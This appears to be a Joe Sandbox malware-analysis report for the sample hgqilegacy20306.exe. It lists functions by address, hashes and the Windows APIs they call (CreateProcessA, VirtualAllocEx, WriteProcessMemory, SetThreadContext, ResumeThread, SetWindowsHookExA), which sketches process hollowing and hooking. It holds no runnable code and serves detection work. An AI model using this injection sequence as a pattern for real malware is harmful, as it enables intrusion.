Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac74b3fb57d723fac90b32ac680c87ce12b982ecd4c6c7ccb129e95bcdb920bf
Instruction ID: fcd63c6d3b42cf0045e1f2ae2e4bea861b2687efd1e4516000ecc796008250d1
Opcode Fuzzy Hash: ac74b3fb57d723fac90b32ac680c87ce12b982ecd4c6c7ccb129e95bcdb920bf
Instruction Fuzzy Hash: F9210AB0D186588BEB19CFA7C8543EEFFB6AFC9300F14C16AC40966264DB740946CF50

Function 002377F0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c30a35c52dbaaae39c4d6fa8905d7c8e3955f37df610ee500ac027086e6f71eb
Instruction ID: 2f6a13ec7e3926a79eb4f39c860e8e7cd1de95272357fbfe18288ce43620304d
Opcode Fuzzy Hash: c30a35c52dbaaae39c4d6fa8905d7c8e3955f37df610ee500ac027086e6f71eb
Instruction Fuzzy Hash: 8921B4B0D146588BEB18CFABC9547EEFAF6AFC8300F14C06AD40966264DBB409468F90

Function 0023C48D Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 325
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0023C75F

Strings

+Hp, xrefs: 0023C4D3
+Hp, xrefs: 0023C502

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID: CreateProcess
String ID: +Hp$+Hp
API String ID: 963392458-59550660
Opcode ID: 1295ed60faea34e07b1236ed626ca8d8d501b80b0a46c83043343892d9435825
Instruction ID: 0ee8a3ce55e34bee0a726b38390d6bbac150d63788b379a971a0e8a4b9ce1163
Opcode Fuzzy Hash: 1295ed60faea34e07b1236ed626ca8d8d501b80b0a46c83043343892d9435825
Instruction Fuzzy Hash: F6C148B1D0021A8FDF25DFA8C841BEDBBB1BF49304F1091AAD819B7250DB749A95CF94

Function 0023C498 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0023C75F

Strings

+Hp, xrefs: 0023C4D3
+Hp, xrefs: 0023C502

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID: CreateProcess
String ID: +Hp$+Hp
API String ID: 963392458-59550660
Opcode ID: 4fc2929cbd092bcb3d3c6ca37d204f96a3f59bcb862bcc60ec9e46baf282d15a
Instruction ID: b3e6c2b458fb50815dbe5e46c5d19e7044bb7d3e0dcc227a24af7e30d8ae530f
Opcode Fuzzy Hash: 4fc2929cbd092bcb3d3c6ca37d204f96a3f59bcb862bcc60ec9e46baf282d15a
Instruction Fuzzy Hash: 3BC138B1D0021A8FDF25DFA8C841BEDBBB1BF49304F1091AAD819B7250DB749A95CF94

Function 0023C0F8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 120
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0023C1D3

Strings

+Hp, xrefs: 0023C122

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: +Hp
API String ID: 3559483778-2518647782
Opcode ID: fa309232f48193a940972c5894e48a784d92899de136b7a5ca1017d7bbb39eff
Instruction ID: d9d38d6e3aca057d526b59372d2112ce8106c9e57031768dffafd1593b38622b
Opcode Fuzzy Hash: fa309232f48193a940972c5894e48a784d92899de136b7a5ca1017d7bbb39eff
Instruction Fuzzy Hash: BC41BBB4D012489FCF00CFA9D984AEEFBF1BB49314F20942AE818B7250D374AA55CF64

Function 0023C100 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0023C1D3

Strings

+Hp, xrefs: 0023C122

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: +Hp
API String ID: 3559483778-2518647782
Opcode ID: a14646f666e99cd7077d0fbeee04271b9237171a1e386ab7ae070e3c2ce2e1f4
Instruction ID: c6a43186fb8c392835c8b0fee302fabdd280805b84489893fa4497baa8fd3596
Opcode Fuzzy Hash: a14646f666e99cd7077d0fbeee04271b9237171a1e386ab7ae070e3c2ce2e1f4
Instruction Fuzzy Hash: 4D41ABB4D002589FCF00CFA9D984AEEFBF1BB49314F20942AE818B7250D774AA55CF64

Function 0023C259 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0023C312

Strings

+Hp, xrefs: 0023C282

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID: MemoryProcessRead
String ID: +Hp
API String ID: 1726664587-2518647782
Opcode ID: e31d0f0691b8a81423276264f83dbdbb15c30a3fbb10f64601384b38f9497786
Instruction ID: 407f16bb5dee591b77fc0db67ff23c0a8d35888f3c0131c114e1e19e7f3c15d9
Opcode Fuzzy Hash: e31d0f0691b8a81423276264f83dbdbb15c30a3fbb10f64601384b38f9497786
Instruction Fuzzy Hash: 1341BCB5D002589FCF10CFAAD884AEEFBB1BF49314F20942AE815B7244D375A955CF64

Function 0023C260 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0023C312

Strings

+Hp, xrefs: 0023C282

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID: MemoryProcessRead
String ID: +Hp
API String ID: 1726664587-2518647782
Opcode ID: b5dc648f98cc39ed1489d8609453f6621172d074a9d9844cc47e2d0135c94202
Instruction ID: 4ce71e68c9130b2e0a9c43c4a720f586e0354d4155b5db0b37752df4bd6e847f
Opcode Fuzzy Hash: b5dc648f98cc39ed1489d8609453f6621172d074a9d9844cc47e2d0135c94202
Instruction Fuzzy Hash: 6D41B9B4D002589FCF10CFAAD884AEEFBB1BF49310F20942AE814B7204C775A955CF68

Function 0023BFD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0023C082

Strings

+Hp, xrefs: 0023BFF2

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID: AllocVirtual
String ID: +Hp
API String ID: 4275171209-2518647782
Opcode ID: e23be9b28b351a68f76bf8cb25e1d83b506e96f7f6c579118f1fdccb21b4d141
Instruction ID: 35473761700a3555627b8a70f96e58405f0f5b556083d2a17cc8ae568c6f9fb4
Opcode Fuzzy Hash: e23be9b28b351a68f76bf8cb25e1d83b506e96f7f6c579118f1fdccb21b4d141
Instruction Fuzzy Hash: D141A8B9D00248DBCF10CFA9D984AAEFBB1AB49314F20942AE814B7310D775A955CFA5

Function 0023BFD8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0023C082

Strings

+Hp, xrefs: 0023BFF2

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID: AllocVirtual
String ID: +Hp
API String ID: 4275171209-2518647782
Opcode ID: cd6bdc5586cfc55ec27059535dc92cd5597076175d86608f3dea0dc8d741fed6
Instruction ID: 5bfcb63a5a2d34ef622aff95d28c10f674f4e50297b4422a3d75eb2d2b796709
Opcode Fuzzy Hash: cd6bdc5586cfc55ec27059535dc92cd5597076175d86608f3dea0dc8d741fed6
Instruction Fuzzy Hash: 5F41A7B8D00248DFCF10CFA9D984AAEFBB1BB49314F20942AE814B7210D775A955CFA4

Function 0023BA68 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0023BB1F

Strings

+Hp, xrefs: 0023BA8F

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID: ContextThreadWow64
String ID: +Hp
API String ID: 983334009-2518647782
Opcode ID: fb04077242e48e241f84a9ff8f8d66d1d4ce407c3eabb400c06d57ca4294caac
Instruction ID: 2a68dab91f2df90ea5a5b6789a146fd016b885c6c192707afcbd8a8a7aa0cf04
Opcode Fuzzy Hash: fb04077242e48e241f84a9ff8f8d66d1d4ce407c3eabb400c06d57ca4294caac
Instruction Fuzzy Hash: FF41BCB4D102589FCF10CFA9D984AEEFBB1BF49314F24842AE815B7244D778A949CF54

Function 0023BA70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0023BB1F

Strings

+Hp, xrefs: 0023BA8F

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID: ContextThreadWow64
String ID: +Hp
API String ID: 983334009-2518647782
Opcode ID: b9436692441dd05bdf03e41aa1085c871776e67299f16fb41d63ad681819f4a9
Instruction ID: a90d4229064667d2e07acf4e68b42f67ee7f89e941545455e556e32b67fce787
Opcode Fuzzy Hash: b9436692441dd05bdf03e41aa1085c871776e67299f16fb41d63ad681819f4a9
Instruction Fuzzy Hash: 8F41ACB4D102589FCF10CFAAD984AEEFBB1BF49314F24842AE815B7244D778A945CF54

Function 0023B979 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 0023B9FE

Strings

+Hp, xrefs: 0023B99A

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID: ResumeThread
String ID: +Hp
API String ID: 947044025-2518647782
Opcode ID: 4ab51cc7275bd6f4cbc75c5072fd2570d6940cf39e8d3000067a9d22d45962c9
Instruction ID: 52ec7b9926237f70f9f76ce027d50c8ac4e45b0262d523913ec67cbf2554ccd9
Opcode Fuzzy Hash: 4ab51cc7275bd6f4cbc75c5072fd2570d6940cf39e8d3000067a9d22d45962c9
Instruction Fuzzy Hash: FE31CAB4D012189FCF10CFA9E884AAEFBB1AF49314F24942AE815B7300C775A905CF94

Function 0023B980 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 0023B9FE

Strings

+Hp, xrefs: 0023B99A

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID: ResumeThread
String ID: +Hp
API String ID: 947044025-2518647782
Opcode ID: 168aac497c8c9cc4349ee1d8b34cd3df10cb485b8a2713866a2e551411df14f8
Instruction ID: 756f6957e424af2ccdeadc1d49c4921867061b3c3a3f8a0f915451271a6b059f
Opcode Fuzzy Hash: 168aac497c8c9cc4349ee1d8b34cd3df10cb485b8a2713866a2e551411df14f8
Instruction Fuzzy Hash: E031BCB4D102189FCF10CFAAD984AAEFBB5AF49314F24942AE815B7300C775A905CF94

Function 001ED01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.405822821.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1ed000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05c1bc9447aaa21631921dedc45a8b3e72222d84670ea03ee7af91dfd1bec4c4
Instruction ID: 684f081338ae86a0e274c9b128e50c2152d2c6e7b30b763f7acd8c474fdbc14d
Opcode Fuzzy Hash: 05c1bc9447aaa21631921dedc45a8b3e72222d84670ea03ee7af91dfd1bec4c4
Instruction Fuzzy Hash: 6D21B075604680EFDB15CF15E884B2ABB65EB84314F38C5A9E84A4B246C736D847CBA1

Function 001ED006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.405822821.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1ed000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1374012aac455eb8d0d0b195f3eb2990cf018af8630874b01d7c2d38a8d56665
Instruction ID: f46db9577fce4f48d35e4541de9753d00afe003c6e87eb73f4e068d98263b60f
Opcode Fuzzy Hash: 1374012aac455eb8d0d0b195f3eb2990cf018af8630874b01d7c2d38a8d56665
Instruction Fuzzy Hash: B5218B755097C08FDB02CF24D994B15BF71EB46314F28C5EAD8498F6A7C33A984ACB62

Non-executed Functions

Function 0023B0C8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1964ecfb3583ff44eab4d0b681e76759fc4070bd725154341f0bfdaca1577679
Instruction ID: 1fd8c93cc467597e5a1334310bfedfacb0221eb1d00d394671906127d97f7361
Opcode Fuzzy Hash: 1964ecfb3583ff44eab4d0b681e76759fc4070bd725154341f0bfdaca1577679
Instruction Fuzzy Hash: 0DE13CB4E102698FDB14DFA9C590AAEFBB2FF89300F248169D915AB356C7319D41CF60

Function 0023A370 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caa1840b857a3a876740bcef7d3d38bc9bf2d30b24c03bb772afd89cf864707e
Instruction ID: 6c9034a502a938333543db6f2168a74a5fe8eedfd5051cf0216df3c119c32f3f
Opcode Fuzzy Hash: caa1840b857a3a876740bcef7d3d38bc9bf2d30b24c03bb772afd89cf864707e
Instruction Fuzzy Hash: 57E13AB4E102598FDB14DFA8C580AADFBB6FF88300F248169D855AB356D731AD42CF61

Function 0023A7A8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7800b3b6c4a5ab2eb2cabccabf08b668d102bb7c057755f2a4708929cbd22825
Instruction ID: 732ee7526680106758e1938469550b21d05690c39a0493b1a149981e911e7839
Opcode Fuzzy Hash: 7800b3b6c4a5ab2eb2cabccabf08b668d102bb7c057755f2a4708929cbd22825
Instruction Fuzzy Hash: 10E12BB4E101598FDB14DFA8C580AADFBB2FF88304F248169D855AB356C731AD42CFA1

Function 0023BBA0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c9238c7c3a62ae26def78a97b95035fffb525c639b0a3dd0b47e2959c0dbff3
Instruction ID: 710c3a7184454bac94671351b063ee56e0232aa6a15ac3ed7586687493b9fed3
Opcode Fuzzy Hash: 0c9238c7c3a62ae26def78a97b95035fffb525c639b0a3dd0b47e2959c0dbff3
Instruction Fuzzy Hash: 0DE10BB4E101598FDB14DFA9C580AADFBF2BF89300F248569E915AB356CB319D42CF60

Function 0023ABE0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b90d3e0c1be2e9a485329533730b3d3aa81c5150bcf3a9cf922b58e192762974
Instruction ID: 00dd26b6271d5f069c148e10a22e48dbd9ca655993d74f6efece3e5bfe852091
Opcode Fuzzy Hash: b90d3e0c1be2e9a485329533730b3d3aa81c5150bcf3a9cf922b58e192762974
Instruction Fuzzy Hash: 97E12BB4E102598FDB14DFA9C580AADFBB2FF89300F248169D855AB356C7319D42CFA1

Function 0023A798 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eddb4d88007f72f7eae6b7701bfae8f2a89ae6d93b495a8e40c1ded6b0c84e87
Instruction ID: 9f2e14cc0d6b274c38ec69a3c7830e22da799ca4d0fa9474a126e740cc623bb9
Opcode Fuzzy Hash: eddb4d88007f72f7eae6b7701bfae8f2a89ae6d93b495a8e40c1ded6b0c84e87
Instruction Fuzzy Hash: 45512D74E142598FDB14CFA9C5805AEFBF2BF89300F24816AD458AB356C7319942CFA1

Function 0023BB90 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98819f2710137ad745d3b72e64e04f0857a014cbc8baa92cc33074b5694fbf9e
Instruction ID: 8ea01a92c6e77e1be5ae4f2f33fba62023a4c0ab152dc73d79661d75a6109004
Opcode Fuzzy Hash: 98819f2710137ad745d3b72e64e04f0857a014cbc8baa92cc33074b5694fbf9e
Instruction Fuzzy Hash: 28514CB4E102598FDB14CFA9C5805AEFBF2BF89300F24856AD408AB356DB319D42CF60

Function 0023DE2C Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 875e4537872690b39f0af522b6efa15624bb81f956e6504ac839b42f2aac0a7a
Instruction ID: 15dda1f8445f43554b5d9e18f00f13f2a37f63ec671750ad0f914f444f7b460b
Opcode Fuzzy Hash: 875e4537872690b39f0af522b6efa15624bb81f956e6504ac839b42f2aac0a7a
Instruction Fuzzy Hash: ACF01CB5D6A244CFCF109F94E8446F8B7BCEB4B311F123091D00E976A2C3B059A99E00

Function 0023DF4A Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abdd87aee3ca8e8bd63cde544152c0c11651457dc5e9e83af10b72aeed93db91
Instruction ID: 30cf827c8567575ff1080f39f23682a0b6c94e8d4d830f34211da29903778a85
Opcode Fuzzy Hash: abdd87aee3ca8e8bd63cde544152c0c11651457dc5e9e83af10b72aeed93db91
Instruction Fuzzy Hash: 0DE0BF75D6A004CBCF105FA4A4042F8B7B8EB4B312F5520A1D50DD7561D37049655F54

Function 0023E478 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eafe81553920e350a38d8fb7401ee40ac90970ad13f69501701a33ba9bf2bcd
Instruction ID: 62ec9ddbb127cbb498e82ad3135e584c238aec2a1b06b30b8cbfb563cedbed81
Opcode Fuzzy Hash: 2eafe81553920e350a38d8fb7401ee40ac90970ad13f69501701a33ba9bf2bcd
Instruction Fuzzy Hash: 8FD01761D6F2D0DECF024B6864180F9BF389E8B216F5A20E7D04ADB0A3C291916C8745

Analysis Process: hgqilegacy20306.exePID: 3508, Parent PID: 3416COMMON

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	80%
Signature Coverage:	0%
Total number of Nodes:	60
Total number of Limit Nodes:	0

Executed Functions

Function 00259A4C Relevance: 2.0, Strings: 1, Instructions: 739COMMON

Download Yara Rule

Strings

N, xrefs: 0025CE37

Memory Dump Source

Source File: 00000008.00000002.916644970.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_250000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: 31cf88fdb91aacad9e981707dcb58b86c91e016b73c8a5dda49282f689dd3737
Instruction ID: eb42af328bf177a92f797251e8a355b4bdd0d3e3f99322f2d1d898e6dc77edb3
Opcode Fuzzy Hash: 31cf88fdb91aacad9e981707dcb58b86c91e016b73c8a5dda49282f689dd3737
Instruction Fuzzy Hash: D682C331D1075A8ADB11EF68C8846EDF7B1FF9A300F50C69AE44976221EB70AAD5CF41

Function 0025DD50 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.916644970.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_250000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22b1037c70887175bfecdb5c11cf88628469c0a96498085f460b02451e8fe621
Instruction ID: 913d44c2142387a03b25900be2a57ca0fcb62d615b60a7c4d4ee49fd2ea7a58b
Opcode Fuzzy Hash: 22b1037c70887175bfecdb5c11cf88628469c0a96498085f460b02451e8fe621
Instruction Fuzzy Hash: EBF1F574D10228CFDB58DFA8C884B9DBBB2BF88305F5585A9D808AB355DB709E85CF50

Function 00258EC4 Relevance: 1.8, APIs: 1, Instructions: 274
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 00259055

Memory Dump Source

Source File: 00000008.00000002.916644970.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_250000_hgqilegacy20306.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 692178b54be07c7aac45a9f5ea95b28b415536ab051959c3a627734b7853cafb
Instruction ID: 0818b35235ce978ef7cf7cae2aca6141c325c2f66ab2bfa245a633108d626ba1
Opcode Fuzzy Hash: 692178b54be07c7aac45a9f5ea95b28b415536ab051959c3a627734b7853cafb
Instruction Fuzzy Hash: 06D1E574E00218CFDB18DFA5C954B9DBBB2BF89301F2091A9D809AB365DB349E85CF10

Function 006E7315 Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,?,?,?), ref: 006E73C9

Memory Dump Source

Source File: 00000008.00000002.916820129.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e0000_hgqilegacy20306.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 35f33b6a605d55c28c81934867b981d24e4be2f90784a6eb53fdcd9743ddd7fe
Instruction ID: c0a03c7608526d62f1932d3835bdee857a4aff6866427894ccc795c5ef031eb9
Opcode Fuzzy Hash: 35f33b6a605d55c28c81934867b981d24e4be2f90784a6eb53fdcd9743ddd7fe
Instruction Fuzzy Hash: 2C4188B8D052589FCF10CFAAD884AEEFBB1BB49310F24942AE815B7350D774A945CF54

Function 006E7318 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,?,?,?), ref: 006E73C9

Memory Dump Source

Source File: 00000008.00000002.916820129.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e0000_hgqilegacy20306.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: c37e454b87ff85ef50965443f181125a74f82582b82a46dfad22d012111d7e71
Instruction ID: f9140b44d8ab786a7b4e552ffeddf0c8d7083f80d355f44bb3746cc340f69056
Opcode Fuzzy Hash: c37e454b87ff85ef50965443f181125a74f82582b82a46dfad22d012111d7e71
Instruction Fuzzy Hash: 654197B4D052589FCF10CFAAD884AEEFBB1BB49310F20A42AE814B7310D734A945CF54

Function 005F82B0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.916766623.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5f0000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fda64bc92d03d358052a76b0b39c3d6a3fe371ea48c210366b1e0575debd6a0c
Instruction ID: 50eb35f5eeab542044c4666c3f606476897cd053482086239c3c9c30aaf5968c
Opcode Fuzzy Hash: fda64bc92d03d358052a76b0b39c3d6a3fe371ea48c210366b1e0575debd6a0c
Instruction Fuzzy Hash: 9AD1B274E002188FDB54DFA5C894BADBBB2FF89300F2491A9D509AB358DB359E81CF50

Function 0061A120 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.916782898.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_610000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea10a09d00a2d625ba98037579bf8e73f3c5cd6a53bff1cee6d401f8cd6ffe26
Instruction ID: cbc87dcc415e59a43ef2660bde55895309638cf740537c53d737312a64df211b
Opcode Fuzzy Hash: ea10a09d00a2d625ba98037579bf8e73f3c5cd6a53bff1cee6d401f8cd6ffe26
